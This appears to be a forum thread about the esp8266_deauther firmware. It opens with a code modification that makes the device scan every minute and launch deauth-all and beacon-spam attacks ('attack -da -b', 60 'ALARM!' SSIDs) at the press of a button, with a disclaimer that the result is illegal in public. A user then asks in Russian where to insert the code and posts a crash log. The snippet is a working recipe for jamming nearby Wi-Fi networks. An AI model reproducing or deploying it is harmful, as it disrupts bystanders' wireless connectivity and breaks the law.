Applying and using the following modifications are up to your responsibility.
I provide this example for you to better understand the code and how such an automatic attack-all could work.
It doesn't mean it will work, I won't provide you with further assistence, or keep this up-to-date.
These modifications make it easy to attack devices you wouldn't want to attack, keep that in mind!
You may easily violate law by using such an attack in public space.
Replace cli
with serialInterface
if you're using an older version of esp8266_deauther!
In the end of setup():
pinMode(D5, INPUT_PULLUP); // enable button pin
pinMode(D4, OUTPUT); // enable LED pin
In the beginning of loop():
cli.runCommand("stopap"); // stop access point and web interface
cli.runCommand("set beaconinterval true"); // change beacon interval from 10/s to 1/s for better performance
cli.runCommand("scan aps -c 60s"); // start scan for access points each minute
cli.runCommand("add ssid ALARM! -cl 60 -f"); // add SSID "ALARM!" 60 times
cli.runCommand("attack -da -b"); // start deauth all and beacon attack
digitalWrite(D4, LOW); // turn LED on
scan.stop(); // stop scan
attack.stop(); // stop attack
digitalWrite(D4, HIGH); // turn LED off
нужна помощь. подскажите куда конкретно надо вставить этот код чтобы работало?
я сделал так
`// start access point/web interface
if (settings.getWebInterface()) startAP();
// version
// setup LED
pinMode(5, INPUT_PULLUP); // притянуто к плюсу
void loop() {
if (digitalRead(5) == LOW) {
currentTime = millis();`
(вероятно это неправильно но я не знаю как исправить) и получил такой результат
Mounting SPIFFS...OK
Formatting SPIFFS...OK
Switched to Channel 13
Settings loaded from /settings.json
Settings saved in /settings.json
Device names loaded from /names.json
SSIDs loaded from /ssids.json
Scan results saved in /scan.json
Serial interface enabled
Started AP
[WiFi] Path: '/web', Mode: 'AP', SSID: 'wifijammer', password: 'hackerman', channel: '13', hidden: true, captive-portal:
Exception (0):
epc1=0x402299cc epc2=0x00000000 epc3=0x00000000 excvaddr=0x00000000 depc=0x00000000
ctx: cont
sp: 3fff18b0 end: 3fff1e30 offset: 01a0
ets Jan 8 2013,rst cause:2, boot mode:(3,7)
load 0x4010f000, len 1264, room 16
tail 0
chksum 0x42
csum 0x42
Mounting SPIFFS...OK
Formatting SPIFFS...